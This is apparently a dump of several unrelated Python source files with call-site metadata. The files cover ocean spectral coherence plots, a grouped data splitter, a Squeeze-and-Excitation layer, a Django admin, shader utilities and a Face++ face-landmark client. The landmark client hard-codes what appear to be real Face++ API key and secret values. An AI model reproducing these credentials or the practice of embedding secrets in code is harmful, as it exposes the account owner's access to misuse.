freq_nyquist = SIO_mod.var_fft(data_sets[j]) if j == 0: spectra_temp_df['Temp_freq'] = freq spectra_temp_df['Temp_spec'] = spec spectra_temp_df['Temp_fft'] = fft if j == 1: spectra_sal_df['Sal_freq'] = freq spectra_sal_df['Sal_spec'] = spec spectra_sal_df['Sal_fft'] = fft if j == 2: spectra_PDO_df['PDO_freq'] = freq spectra_PDO_df['PDO_spec'] = spec spectra_PDO_df['PDO_fft'] = fft if j == 3: spectra_ENSO_df['ENSO_freq'] = freq spectra_ENSO_df['ENSO_spec'] = spec spectra_ENSO_df['ENSO_fft'] = fft def band_average(fft_var1,fft_var2,frequency,n_av): # fft_var1 and fft_var2 are the inputs computed via fft # they can be the same variable or different variables # n_av is the number of bands to be used for smoothing (nice if it is an odd number) # this function is limnited to 100,000 points but can easily be modified nmax=100000 # T_length = (len(fft_var1) * 2 - 2) # define some variables and arrays n_spec=len(fft_var1) n_av2=int(n_av//2+1) #number of band averages/2 + 1 spec_amp_av=np.zeros(nmax) spec_phase_av=np.zeros(nmax) freq_av=np.zeros(nmax) # average the lowest frequency bands first (with half as many points in the average) sum_low_amp=0. sum_low_phase=0. count=0 spectrum_amp=np.absolute(fft_var1*np.conj(fft_var2))#/(2.*np.pi*T_length*delt) spectrum_phase=np.angle(fft_var1*np.conj(fft_var2),deg=True) #/(2.*np.pi*T_length*delt) don't know if I need the 2pi/Tdeltt here... # for i in range(0,n_av2): sum_low_amp+=spectrum_amp[i] sum_low_phase+=spectrum_phase[i] spec_amp_av[0]=sum_low_amp/n_av2 spec_phase_av[0]=sum_low_phase/n_av # compute the rest of the averages for i in range(n_av2,n_spec-n_av,n_av): count+=1 spec_amp_est=np.mean(spectrum_amp[i:i+n_av]) spec_phase_est=np.mean(spectrum_phase[i:i+n_av]) freq_est=frequency[i+n_av//2] spec_amp_av[count]=spec_amp_est spec_phase_av[count]=spec_phase_est freq_av[count]=freq_est # omega0 = 2.*np.pi/(T_length*delt) # contract the arrays spec_amp_av=spec_amp_av[0:count] spec_phase_av=spec_phase_av[0:count] freq_av=freq_av[0:count] return spec_amp_av,spec_phase_av,freq_av,count n_av = 5 # define terms to compute coherence between temp and ENSO t_freq,t_spec,t_spec_amp,t_fft,t_delt,t_freq_T,t_freq_nyquist = SIO_mod.var_fft(temp_sampled) #take fft/compute spectra of temp_sampled at 30 day intervals t_spec_b,t_phase_b,t_freq_av_b,count=band_average(t_fft,t_fft,t_freq,n_av) e_spec_b,e_phase_b,e_freq_av_b,count=band_average(spectra_ENSO_df['ENSO_fft'],spectra_ENSO_df['ENSO_fft'],spectra_ENSO_df['ENSO_freq'],n_av) e_fft_star = np.conj(spectra_ENSO_df['ENSO_fft']) cospec_amp2,cospec_phase2,freq_av2,count2=band_average(t_fft,e_fft_star,spectra_ENSO_df['ENSO_freq'],n_av) coh_sq2=cospec_amp2**2/(t_spec_b*e_spec_b) # define colors t_color = 'cadetblue' s_color = 'darkslateblue' p_color = 'seagreen' e_color = 'steelblue' freq_ann = 2*np.pi/365.25 # plot the coherence and phase between ENSO and temperature tstr = 'SIO Temperature and ENSO Index \nCoherence and Phase' im_name = 'SIO_TempENSO_CoherencePhase.jpg' NR = 2; NC = 1 fig, axes = plt.subplots(nrows = NR,ncols=NC,figsize = (10,7)) axes[0].semilogx(freq_av2,coh_sq2, color = e_color) axes[0].set_xlabel('$\omega$ (radians/day)') axes[0].set_ylabel('Squared Coherence $\it{T}$-$\it{ENSO}$') axes[0].axvline(t_freq_nyquist, color = 'black', linestyle = '--', alpha = 0.5) axes[0].text(0.075, 0.1,'$\omega_{max}$', alpha = 0.5) #transform = ax.transAxes) axes[0].axvline(t_freq_T, color = 'black', linestyle = '--', alpha = 0.5) axes[0].text(0.00018, 0.1,'$\omega_o$', alpha = 0.5) #transform = ax.transAxes) axes[0].axvline(freq_ann, color = 'black', linestyle = '--', alpha = 0.5) axes[0].text(0.0098, 0.1, 'Annual', alpha = 0.5)#transform = ax.transAxes) axes[1].semilogx(freq_av2, cospec_phase2, color = e_color) axes[1].set_xlabel('$\omega$ (radians/day)') axes[1].set_ylabel('Phase $\it{T}$-$\it{ENSO}$, degrees') axes[1].axvline(t_freq_nyquist, color = 'black', linestyle = '--', alpha = 0.5) axes[1].text(0.075, -110,'$\omega_{max}$', alpha = 0.5) #transform = ax.transAxes) axes[1].axvline(t_freq_T, color = 'black', linestyle = '--', alpha = 0.5) axes[1].text(0.00018, -110,'$\omega_o$', alpha = 0.5)#transform = ax.transAxes) axes[1].axvline(freq_ann, color = 'black', linestyle = '--', alpha = 0.5) axes[1].text(0.0098, -110, 'Annual', alpha = 0.5)#transform = ax.transAxes) fig.suptitle(tstr) # fig.tight_layout(pad=2.0) plt.savefig(path_out + im_name) plt.show() n_av = 5 # define terms to compute coherence between temp and ENSO #t_freq,t_spec,t_spec_amp,t_fft,t_delt,t_freq_T,t_freq_nyquist = SIO_mod.var_fft(temp_sampled) #take fft/compute spectra of temp_sampled at 30 day intervals #t_spec_b,t_phase_b,t_freq_av_b,count=band_average(t_fft,t_fft,t_freq,n_av) p_spec_b,p_phase_b,p_freq_av_b,count=band_average(spectra_PDO_df['PDO_fft'],spectra_PDO_df['PDO_fft'],spectra_PDO_df['PDO_freq'],n_av) p_fft_star = np.conj(spectra_PDO_df['PDO_fft']) cospec_amp2,cospec_phase2,freq_av2,count2=band_average(t_fft,p_fft_star,spectra_PDO_df['PDO_freq'],n_av) coh_sq2=cospec_amp2**2/(t_spec_b*p_spec_b) # plot the coherence and phase between ENSO and temperature tstr = 'SIO Temperature and PDO Index \nCoherence and Phase' im_name = 'SIO_TempPDO_CoherencePhase.jpg' NR = 2; NC = 1 fig, axes = plt.subplots(nrows = NR,ncols=NC,figsize = (10,7)) axes[0].semilogx(freq_av2,coh_sq2, color = p_color) axes[0].set_xlabel('$\omega$ (radians/day)') axes[0].set_ylabel('Squared Coherence $\it{T}$-$\it{PDO}$') axes[0].axvline(t_freq_nyquist, color = 'black', linestyle = '--', alpha = 0.5) axes[0].text(0.075, 0.1,'$\omega_{max}$', alpha = 0.5) #transform = ax.transAxes) axes[0].axvline(t_freq_T, color = 'black', linestyle = '--', alpha = 0.5) axes[0].text(0.00018, 0.1,'$\omega_o$', alpha = 0.5) #transform = ax.transAxes) axes[0].axvline(freq_ann, color = 'black', linestyle = '--', alpha = 0.5) axes[0].text(0.0098, 0.1, 'Annual', alpha = 0.5)#transform = ax.transAxes) axes[1].semilogx(freq_av2, cospec_phase2, color = p_color) axes[1].set_xlabel('$\omega$ (radians/day)') axes[1].set_ylabel('Phase $\it{T}$-$\it{PDO}$, degrees') axes[1].axvline(t_freq_nyquist, color = 'black', linestyle = '--', alpha = 0.5) axes[1].text(0.075, -110,'$\omega_{max}$', alpha = 0.5) #transform = ax.transAxes) axes[1].axvline(t_freq_T, color = 'black', linestyle = '--', alpha = 0.5) axes[1].text(0.00018, -110,'$\omega_o$', alpha = 0.5)#transform = ax.transAxes) axes[1].axvline(freq_ann, color = 'black', linestyle = '--', alpha = 0.5) axes[1].text(0.0098, -110, 'Annual', alpha = 0.5)#transform = ax.transAxes) fig.suptitle(tstr) # fig.tight_layout(pad=2.0) plt.savefig(path_out + im_name) plt.show()
[((20, 0, 20, 15), 'importlib.reload', 'reload', ({(20, 7, 20, 14): 'SIO_mod'}, {}), '(SIO_mod)', False, 'from importlib import reload\n'), ((23, 11, 23, 125), 'pandas.read_csv', 'pd.read_csv', (), '', True, 'import pandas as pd\n'), ((24, 12, 24, 126), 'pandas.read_csv', 'pd.read_csv', (), '', True, 'import pandas as pd\n'), ((25, 12, 25, 98), 'pandas.read_excel', 'pd.read_excel', ({(25, 26, 25, 97): '"""/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_ENSO_data.xlsx"""'}, {}), "(\n '/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_ENSO_data.xlsx')", True, 'import pandas as pd\n'), ((26, 19, 26, 112), 'pandas.read_excel', 'pd.read_excel', ({(26, 33, 26, 111): '"""/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_ENSO_recent_data.xlsx"""'}, {}), "(\n '/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_ENSO_recent_data.xlsx'\n )", True, 'import pandas as pd\n'), ((27, 11, 27, 107), 'pandas.read_csv', 'pd.read_csv', (), '', True, 'import pandas as pd\n'), ((31, 19, 31, 69), 'pandas.to_datetime', 'pd.to_datetime', ({(31, 34, 31, 68): "sal_data[['YEAR', 'MONTH', 'DAY']]"}, {}), "(sal_data[['YEAR', 'MONTH', 'DAY']])", True, 'import pandas as pd\n'), ((32, 20, 32, 71), 'pandas.to_datetime', 'pd.to_datetime', ({(32, 35, 32, 70): "temp_data[['YEAR', 'MONTH', 'DAY']]"}, {}), "(temp_data[['YEAR', 'MONTH', 'DAY']])", True, 'import pandas as pd\n'), ((34, 19, 34, 66), 'pandas.to_datetime', 'pd.to_datetime', (), '', True, 'import pandas as pd\n'), ((55, 10, 55, 69), 'numpy.polyfit', 'np.polyfit', ({(55, 21, 55, 35): 'sal_data.index', (55, 36, 55, 66): "sal_data['SURF_SAL_PSU_NOAVG']", (55, 67, 55, 68): '1'}, {}), "(sal_data.index, sal_data['SURF_SAL_PSU_NOAVG'], 1)", True, 'import numpy as np\n'), ((56, 13, 56, 31), 'numpy.poly1d', 'np.poly1d', ({(56, 23, 56, 30): 'sal_fit'}, {}), '(sal_fit)', True, 'import numpy as np\n'), ((57, 11, 57, 71), 'numpy.polyfit', 'np.polyfit', ({(57, 22, 57, 37): 'temp_data.index', (57, 38, 57, 68): "temp_data['SURF_TEMP_C_NOAVG']", (57, 69, 57, 70): '1'}, {}), "(temp_data.index, temp_data['SURF_TEMP_C_NOAVG'], 1)", True, 'import numpy as np\n'), ((58, 14, 58, 33), 'numpy.poly1d', 'np.poly1d', ({(58, 24, 58, 32): 'temp_fit'}, {}), '(temp_fit)', True, 'import numpy as np\n'), ((96, 7, 96, 33), 'scipy.signal.butter', 'signal.butter', ({(96, 21, 96, 22): '4', (96, 24, 96, 25): 'w', (96, 27, 96, 32): '"""low"""'}, {}), "(4, w, 'low')", False, 'from scipy import signal\n'), ((97, 14, 97, 45), 'scipy.signal.filtfilt', 'signal.filtfilt', ({(97, 30, 97, 31): 'b', (97, 33, 97, 34): 'a', (97, 36, 97, 44): 'temp_tri'}, {}), '(b, a, temp_tri)', False, 'from scipy import signal\n'), ((98, 13, 98, 43), 'scipy.signal.filtfilt', 'signal.filtfilt', ({(98, 29, 98, 30): 'b', (98, 32, 98, 33): 'a', (98, 35, 98, 42): 'sal_tri'}, {}), '(b, a, sal_tri)', False, 'from scipy import signal\n'), ((104, 18, 104, 80), 'pandas.DataFrame', 'pd.DataFrame', (), '', True, 'import pandas as pd\n'), ((105, 17, 105, 76), 'pandas.DataFrame', 'pd.DataFrame', (), '', True, 'import pandas as pd\n'), ((106, 17, 106, 76), 'pandas.DataFrame', 'pd.DataFrame', (), '', True, 'import pandas as pd\n'), ((107, 18, 107, 80), 'pandas.DataFrame', 'pd.DataFrame', (), '', True, 'import pandas as pd\n'), ((180, 64, 180, 93), 'SIO_modules.var_fft', 'SIO_mod.var_fft', ({(180, 80, 180, 92): 'temp_sampled'}, {}), '(temp_sampled)', True, 'import SIO_modules as SIO_mod\n'), ((183, 13, 183, 49), 'numpy.conj', 'np.conj', ({(183, 21, 183, 48): "spectra_ENSO_df['ENSO_fft']"}, {}), "(spectra_ENSO_df['ENSO_fft'])", True, 'import numpy as np\n'), ((199, 12, 199, 62), 'matplotlib.pyplot.subplots', 'plt.subplots', (), '', True, 'import matplotlib.pyplot as plt\n'), ((220, 0, 220, 31), 'matplotlib.pyplot.savefig', 'plt.savefig', ({(220, 12, 220, 30): '(path_out + im_name)'}, {}), '(path_out + im_name)', True, 'import matplotlib.pyplot as plt\n'), ((221, 0, 221, 10), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((228, 13, 228, 47), 'numpy.conj', 'np.conj', ({(228, 21, 228, 46): "spectra_PDO_df['PDO_fft']"}, {}), "(spectra_PDO_df['PDO_fft'])", True, 'import numpy as np\n'), ((237, 12, 237, 62), 'matplotlib.pyplot.subplots', 'plt.subplots', (), '', True, 'import matplotlib.pyplot as plt\n'), ((258, 0, 258, 31), 'matplotlib.pyplot.savefig', 'plt.savefig', ({(258, 12, 258, 30): '(path_out + im_name)'}, {}), '(path_out + im_name)', True, 'import matplotlib.pyplot as plt\n'), ((259, 0, 259, 10), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((117, 57, 117, 86), 'SIO_modules.var_fft', 'SIO_mod.var_fft', ({(117, 73, 117, 85): 'data_sets[j]'}, {}), '(data_sets[j])', True, 'import SIO_modules as SIO_mod\n'), ((147, 16, 147, 30), 'numpy.zeros', 'np.zeros', ({(147, 25, 147, 29): 'nmax'}, {}), '(nmax)', True, 'import numpy as np\n'), ((148, 18, 148, 32), 'numpy.zeros', 'np.zeros', ({(148, 27, 148, 31): 'nmax'}, {}), '(nmax)', True, 'import numpy as np\n'), ((149, 12, 149, 26), 'numpy.zeros', 'np.zeros', ({(149, 21, 149, 25): 'nmax'}, {}), '(nmax)', True, 'import numpy as np\n'), ((165, 21, 165, 52), 'numpy.mean', 'np.mean', ({(165, 29, 165, 51): 'spectrum_amp[i:i + n_av]'}, {}), '(spectrum_amp[i:i + n_av])', True, 'import numpy as np\n'), ((166, 23, 166, 56), 'numpy.mean', 'np.mean', ({(166, 31, 166, 55): 'spectrum_phase[i:i + n_av]'}, {}), '(spectrum_phase[i:i + n_av])', True, 'import numpy as np\n'), ((154, 38, 154, 55), 'numpy.conj', 'np.conj', ({(154, 46, 154, 54): 'fft_var2'}, {}), '(fft_var2)', True, 'import numpy as np\n'), ((155, 37, 155, 54), 'numpy.conj', 'np.conj', ({(155, 45, 155, 53): 'fft_var2'}, {}), '(fft_var2)', True, 'import numpy as np\n')]
rcdilorenzo/abfs
abfs/group_data_split.py
a897d00a4589a9412a9b9e737f8db91df008fc26
from collections import namedtuple as Struct from sklearn.model_selection import GroupShuffleSplit, ShuffleSplit DataSplitConfig = Struct('DataSplitConfig', ['validation_size', 'test_size', 'random_seed']) DEFAULT_SPLIT_CONFIG = DataSplitConfig(0.2, 0.2, 1337) class GroupDataSplit(): def __init__(self, df, key, config=DEFAULT_SPLIT_CONFIG): self.config = config self.key = key self._df = df self._split_data() @property def total(self): """Total records in the data frame""" return len(self._df) def train_df(self): """Randomized train data frame""" return self._train_df.sample(frac=1).reset_index(drop=True) @property def val_df(self): """Validation data frame""" return self._val_df @property def test_df(self): """Test data frame""" return self._test_df @property def test_split(self): return GroupShuffleSplit(test_size=self.config.test_size, random_state=self.config.random_seed).split @property def val_split(self): val_size = self.config.validation_size / (1 - self.config.test_size) return GroupShuffleSplit(test_size=val_size, random_state=self.config.random_seed).split def _split_data(self): rem_indices, test_indices = next( self.test_split(self._df, groups=self._df[self.key]) ) rem_df = self._df.iloc[rem_indices] train_indices, val_indices = next( self.val_split(rem_df, groups=rem_df[self.key]) ) self._test_df = self._df.iloc[test_indices] self._val_df = rem_df.iloc[val_indices] self._train_df = rem_df.iloc[train_indices]
[((4, 18, 4, 92), 'collections.namedtuple', 'Struct', ({(4, 25, 4, 42): '"""DataSplitConfig"""', (4, 44, 4, 91): "['validation_size', 'test_size', 'random_seed']"}, {}), "('DataSplitConfig', ['validation_size', 'test_size', 'random_seed'])", True, 'from collections import namedtuple as Struct\n'), ((36, 15, 37, 70), 'sklearn.model_selection.GroupShuffleSplit', 'GroupShuffleSplit', (), '', False, 'from sklearn.model_selection import GroupShuffleSplit, ShuffleSplit\n'), ((42, 15, 43, 70), 'sklearn.model_selection.GroupShuffleSplit', 'GroupShuffleSplit', (), '', False, 'from sklearn.model_selection import GroupShuffleSplit, ShuffleSplit\n')]
YuxinZou/mmclassification
mmcls/models/utils/se_layer.py
2037260ea6c98a3b115e97727e1151a1c2c32f7a
# Copyright (c) OpenMMLab. All rights reserved. import mmcv import torch.nn as nn from mmcv.cnn import ConvModule from mmcv.runner import BaseModule from .make_divisible import make_divisible class SELayer(BaseModule): """Squeeze-and-Excitation Module. Args: channels (int): The input (and output) channels of the SE layer. squeeze_channels (None or int): The intermediate channel number of SElayer. Default: None, means the value of ``squeeze_channels`` is ``make_divisible(channels // ratio, divisor)``. ratio (int): Squeeze ratio in SELayer, the intermediate channel will be ``make_divisible(channels // ratio, divisor)``. Only used when ``squeeze_channels`` is None. Default: 16. divisor(int): The divisor to true divide the channel number. Only used when ``squeeze_channels`` is None. Default: 8. conv_cfg (None or dict): Config dict for convolution layer. Default: None, which means using conv2d. act_cfg (dict or Sequence[dict]): Config dict for activation layer. If act_cfg is a dict, two activation layers will be configurated by this dict. If act_cfg is a sequence of dicts, the first activation layer will be configurated by the first dict and the second activation layer will be configurated by the second dict. Default: (dict(type='ReLU'), dict(type='Sigmoid')) """ def __init__(self, channels, squeeze_channels=None, ratio=16, divisor=8, bias='auto', conv_cfg=None, act_cfg=(dict(type='ReLU'), dict(type='Sigmoid')), init_cfg=None): super(SELayer, self).__init__(init_cfg) if isinstance(act_cfg, dict): act_cfg = (act_cfg, act_cfg) assert len(act_cfg) == 2 assert mmcv.is_tuple_of(act_cfg, dict) self.global_avgpool = nn.AdaptiveAvgPool2d(1) if squeeze_channels is None: squeeze_channels = make_divisible(channels // ratio, divisor) assert isinstance(squeeze_channels, int) and squeeze_channels > 0, \ '"squeeze_channels" should be a positive integer, but get ' + \ f'{squeeze_channels} instead.' self.conv1 = ConvModule( in_channels=channels, out_channels=squeeze_channels, kernel_size=1, stride=1, bias=bias, conv_cfg=conv_cfg, act_cfg=act_cfg[0]) self.conv2 = ConvModule( in_channels=squeeze_channels, out_channels=channels, kernel_size=1, stride=1, bias=bias, conv_cfg=conv_cfg, act_cfg=act_cfg[1]) def forward(self, x): out = self.global_avgpool(x) out = self.conv1(out) out = self.conv2(out) return x * out
[((46, 15, 46, 46), 'mmcv.is_tuple_of', 'mmcv.is_tuple_of', ({(46, 32, 46, 39): 'act_cfg', (46, 41, 46, 45): 'dict'}, {}), '(act_cfg, dict)', False, 'import mmcv\n'), ((47, 30, 47, 53), 'torch.nn.AdaptiveAvgPool2d', 'nn.AdaptiveAvgPool2d', ({(47, 51, 47, 52): '1'}, {}), '(1)', True, 'import torch.nn as nn\n'), ((53, 21, 60, 31), 'mmcv.cnn.ConvModule', 'ConvModule', (), '', False, 'from mmcv.cnn import ConvModule\n'), ((61, 21, 68, 31), 'mmcv.cnn.ConvModule', 'ConvModule', (), '', False, 'from mmcv.cnn import ConvModule\n')]
James19stack/instagram-copy_cat
instagram/admin.py
996a8678cec84a05e97d803356194cd112ee53e6
from django.contrib import admin from .models import Images,Comments,Profile # Register your models here. class CommentInline(admin.TabularInline): model=Comments extra=3 class ImageInline(admin.ModelAdmin): fieldsets=[ (None,{'fields':['image']}), (None,{'fields':['image_name']}), (None,{'fields':['image_caption']}), (None,{'fields':['likes']}), ] inlines=[CommentInline] admin.site.site_header='InstaPost Admin' admin.site.site_title='InstaPost Admin Dashboard' admin.site.register(Images,ImageInline) admin.site.register(Profile)
[((22, 0, 22, 39), 'django.contrib.admin.site.register', 'admin.site.register', ({(22, 20, 22, 26): 'Images', (22, 27, 22, 38): 'ImageInline'}, {}), '(Images, ImageInline)', False, 'from django.contrib import admin\n'), ((23, 0, 23, 28), 'django.contrib.admin.site.register', 'admin.site.register', ({(23, 20, 23, 27): 'Profile'}, {}), '(Profile)', False, 'from django.contrib import admin\n')]
pereradrian/mandelbruh
mandelbruh/util.py
fb68c5f2af84d51097e73f3a248e3a1b95fbbf47
import numpy as np def normalize(x): return x / np.linalg.norm(x) def norm_sq(v): return np.dot(v,v) def norm(v): return np.linalg.norm(v) def get_sub_keys(v): if type(v) is not tuple and type(v) is not list: return [] return [k for k in v if type(k) is str] def to_vec3(v): if isinstance(v, (float, int)): return np.array([v, v, v], dtype=np.float32) elif len(get_sub_keys(v)) > 0: return v else: return np.array([v[0], v[1], v[2]], dtype=np.float32) def to_str(x): if type(x) is bool: return "1" if x else "0" elif isinstance(x, (list, tuple)): return vec3_str(x) else: return str(x) def float_str(x): if type(x) is str: return '_' + x else: return str(x) def vec3_str(v): if type(v) is str: return '_' + v elif isinstance(v, (float, int)): return 'vec3(' + str(v) + ')' else: return 'vec3(' + float_str(v[0]) + ',' + float_str(v[1]) + ',' + float_str(v[2]) + ')' def vec3_eq(v, val): if type(v) is str: return False for i in range(3): if v[i] != val[i]: return False return True def smin(a, b, k): h = min(max(0.5 + 0.5*(b - a)/k, 0.0), 1.0) return b*(1 - h) + a*h - k*h*(1.0 - h) def get_global(k): if type(k) is str: return _mandelbruh_GLOBAL_VARS[k] elif type(k) is tuple or type(k) is list: return np.array([get_global(i) for i in k], dtype=np.float32) else: return k def set_global_float(k): if type(k) is str: _mandelbruh_GLOBAL_VARS[k] = 0.0 return k def set_global_vec3(k): if type(k) is str: _mandelbruh_GLOBAL_VARS[k] = to_vec3((0,0,0)) return k elif isinstance(k, (float, int)): return to_vec3(k) else: sk = get_sub_keys(k) for i in sk: _mandelbruh_GLOBAL_VARS[i] = 0.0 return to_vec3(k) def cond_offset(p): if type(p) is str or np.count_nonzero(p) > 0: return ' - vec4(' + vec3_str(p) + ', 0)' return '' def cond_subtract(p): if type(p) is str or p > 0: return ' - ' + float_str(p) return '' def make_color(geo): if type(geo.color) is tuple or type(geo.color) is np.ndarray: return 'vec4(' + vec3_str(geo.color) + ', ' + geo.glsl() + ')' elif geo.color == 'orbit' or geo.color == 'o': return 'vec4(orbit, ' + geo.glsl() + ')' else: raise Exception("Invalid coloring type") _mandelbruh_GLOBAL_VARS = {}
[((7, 8, 7, 19), 'numpy.dot', 'np.dot', ({(7, 15, 7, 16): 'v', (7, 17, 7, 18): 'v'}, {}), '(v, v)', True, 'import numpy as np\n'), ((10, 8, 10, 25), 'numpy.linalg.norm', 'np.linalg.norm', ({(10, 23, 10, 24): 'v'}, {}), '(v)', True, 'import numpy as np\n'), ((4, 12, 4, 29), 'numpy.linalg.norm', 'np.linalg.norm', ({(4, 27, 4, 28): 'x'}, {}), '(x)', True, 'import numpy as np\n'), ((19, 9, 19, 46), 'numpy.array', 'np.array', (), '', True, 'import numpy as np\n'), ((23, 9, 23, 55), 'numpy.array', 'np.array', (), '', True, 'import numpy as np\n'), ((85, 22, 85, 41), 'numpy.count_nonzero', 'np.count_nonzero', ({(85, 39, 85, 40): 'p'}, {}), '(p)', True, 'import numpy as np\n')]
awen1988/yry
core/recognizer.py
b65ccd7062d60f605fc978a87e060d0015cf1d4c
""" recognize face landmark """ import json import os import requests import numpy as np FACE_POINTS = list(range(0, 83)) JAW_POINTS = list(range(0, 19)) LEFT_EYE_POINTS = list(range(19, 29)) LEFT_BROW_POINTS = list(range(29, 37)) MOUTH_POINTS = list(range(37, 55)) NOSE_POINTS = list(range(55, 65)) RIGHT_EYE_POINTS = list(range(65, 75)) RIGHT_BROW_POINTS = list(range(75, 83)) LEFT_FACE = list(range(0, 10)) + list(range(29, 34)) RIGHT_FACE = list(range(9, 19)) + list(range(75, 80)) JAW_END = 19 FACE_START = 0 FACE_END = 83 OVERLAY_POINTS = [ LEFT_FACE, RIGHT_FACE, JAW_POINTS, ] def face_points(image): points = [] txt = image + '.txt' if os.path.isfile(txt): with open(txt) as file: for line in file: points = line elif os.path.isfile(image): points = landmarks_by_face__(image) with open(txt, 'w') as file: file.write(str(points)) faces = json.loads(points)['faces'] if len(faces) == 0: err = 404 else: err = 0 matrix_list = np.matrix(matrix_marks(faces[0]['landmark'])) point_list = [] for p in matrix_list.tolist(): point_list.append((int(p[0]), int(p[1]))) return matrix_list, point_list, err def landmarks_by_face__(image): url = 'https://api-cn.faceplusplus.com/facepp/v3/detect' params = { 'api_key': 'ZBbrYf41rX5AJ2mVDEcdIERF7HOlpG6t', 'api_secret': 'G5qlzXk7Wd9iE6MlORYPRulJ2lihdt9U', 'return_landmark': 1, } file = {'image_file': open(image, 'rb')} r = requests.post(url=url, files=file, data=params) if r.status_code == requests.codes.ok: return r.content.decode('utf-8') else: return r.content def matrix_rectangle(left, top, width, height): pointer = [ (left, top), (left + width / 2, top), (left + width - 1, top), (left + width - 1, top + height / 2), (left, top + height / 2), (left, top + height - 1), (left + width / 2, top + height - 1), (left + width - 1, top + height - 1) ] return pointer def matrix_marks(res): pointer = [ [res['contour_left1']['x'], res['contour_left1']['y']], [res['contour_left2']['x'], res['contour_left2']['y']], [res['contour_left3']['x'], res['contour_left3']['y']], [res['contour_left4']['x'], res['contour_left4']['y']], [res['contour_left5']['x'], res['contour_left5']['y']], [res['contour_left6']['x'], res['contour_left6']['y']], [res['contour_left7']['x'], res['contour_left7']['y']], [res['contour_left8']['x'], res['contour_left8']['y']], [res['contour_left9']['x'], res['contour_left9']['y']], [res['contour_chin']['x'], res['contour_chin']['y']], [res['contour_right9']['x'], res['contour_right9']['y']], [res['contour_right8']['x'], res['contour_right8']['y']], [res['contour_right7']['x'], res['contour_right7']['y']], [res['contour_right6']['x'], res['contour_right6']['y']], [res['contour_right5']['x'], res['contour_right5']['y']], [res['contour_right4']['x'], res['contour_right4']['y']], [res['contour_right3']['x'], res['contour_right3']['y']], [res['contour_right2']['x'], res['contour_right2']['y']], [res['contour_right1']['x'], res['contour_right1']['y']], [res['left_eye_bottom']['x'], res['left_eye_bottom']['y']], [res['left_eye_center']['x'], res['left_eye_center']['y']], [res['left_eye_left_corner']['x'], res['left_eye_left_corner']['y']], [res['left_eye_lower_left_quarter']['x'], res['left_eye_lower_left_quarter']['y']], [res['left_eye_lower_right_quarter']['x'], res['left_eye_lower_right_quarter']['y']], [res['left_eye_pupil']['x'], res['left_eye_pupil']['y']], [res['left_eye_right_corner']['x'], res['left_eye_right_corner']['y']], [res['left_eye_top']['x'], res['left_eye_top']['y']], [res['left_eye_upper_left_quarter']['x'], res['left_eye_upper_left_quarter']['y']], [res['left_eye_upper_right_quarter']['x'], res['left_eye_upper_right_quarter']['y']], [res['left_eyebrow_left_corner']['x'], res['left_eyebrow_left_corner']['y']], [res['left_eyebrow_upper_left_quarter']['x'], res['left_eyebrow_upper_left_quarter']['y']], [res['left_eyebrow_upper_middle']['x'], res['left_eyebrow_upper_middle']['y']], [res['left_eyebrow_upper_right_quarter']['x'], res['left_eyebrow_upper_right_quarter']['y']], [res['left_eyebrow_right_corner']['x'], res['left_eyebrow_right_corner']['y']], [res['left_eyebrow_lower_left_quarter']['x'], res['left_eyebrow_lower_left_quarter']['y']], [res['left_eyebrow_lower_middle']['x'], res['left_eyebrow_lower_middle']['y']], [res['left_eyebrow_lower_right_quarter']['x'], res['left_eyebrow_lower_right_quarter']['y']], [res['mouth_left_corner']['x'], res['mouth_left_corner']['y']], [res['mouth_lower_lip_bottom']['x'], res['mouth_lower_lip_bottom']['y']], [res['mouth_lower_lip_left_contour1']['x'], res['mouth_lower_lip_left_contour1']['y']], [res['mouth_lower_lip_left_contour2']['x'], res['mouth_lower_lip_left_contour2']['y']], [res['mouth_lower_lip_left_contour3']['x'], res['mouth_lower_lip_left_contour3']['y']], [res['mouth_lower_lip_right_contour1']['x'], res['mouth_lower_lip_right_contour1']['y']], [res['mouth_lower_lip_right_contour2']['x'], res['mouth_lower_lip_right_contour2']['y']], [res['mouth_lower_lip_right_contour3']['x'], res['mouth_lower_lip_right_contour3']['y']], [res['mouth_lower_lip_top']['x'], res['mouth_lower_lip_top']['y']], [res['mouth_right_corner']['x'], res['mouth_right_corner']['y']], [res['mouth_upper_lip_bottom']['x'], res['mouth_upper_lip_bottom']['y']], [res['mouth_upper_lip_left_contour1']['x'], res['mouth_upper_lip_left_contour1']['y']], [res['mouth_upper_lip_left_contour2']['x'], res['mouth_upper_lip_left_contour2']['y']], [res['mouth_upper_lip_left_contour3']['x'], res['mouth_upper_lip_left_contour3']['y']], [res['mouth_upper_lip_right_contour1']['x'], res['mouth_upper_lip_right_contour1']['y']], [res['mouth_upper_lip_right_contour2']['x'], res['mouth_upper_lip_right_contour2']['y']], [res['mouth_upper_lip_right_contour3']['x'], res['mouth_upper_lip_right_contour3']['y']], [res['mouth_upper_lip_top']['x'], res['mouth_upper_lip_top']['y']], [res['nose_contour_left1']['x'], res['nose_contour_left1']['y']], [res['nose_contour_left2']['x'], res['nose_contour_left2']['y']], [res['nose_contour_left3']['x'], res['nose_contour_left3']['y']], [res['nose_contour_lower_middle']['x'], res['nose_contour_lower_middle']['y']], [res['nose_contour_right1']['x'], res['nose_contour_right1']['y']], [res['nose_contour_right2']['x'], res['nose_contour_right2']['y']], [res['nose_contour_right3']['x'], res['nose_contour_right3']['y']], [res['nose_left']['x'], res['nose_left']['y']], [res['nose_right']['x'], res['nose_right']['y']], [res['nose_tip']['x'], res['nose_tip']['y']], [res['right_eye_bottom']['x'], res['right_eye_bottom']['y']], [res['right_eye_center']['x'], res['right_eye_center']['y']], [res['right_eye_left_corner']['x'], res['right_eye_left_corner']['y']], [res['right_eye_lower_left_quarter']['x'], res['right_eye_lower_left_quarter']['y']], [res['right_eye_lower_right_quarter']['x'], res['right_eye_lower_right_quarter']['y']], [res['right_eye_pupil']['x'], res['right_eye_pupil']['y']], [res['right_eye_right_corner']['x'], res['right_eye_right_corner']['y']], [res['right_eye_top']['x'], res['right_eye_top']['y']], [res['right_eye_upper_left_quarter']['x'], res['right_eye_upper_left_quarter']['y']], [res['right_eye_upper_right_quarter']['x'], res['right_eye_upper_right_quarter']['y']], [res['right_eyebrow_left_corner']['x'], 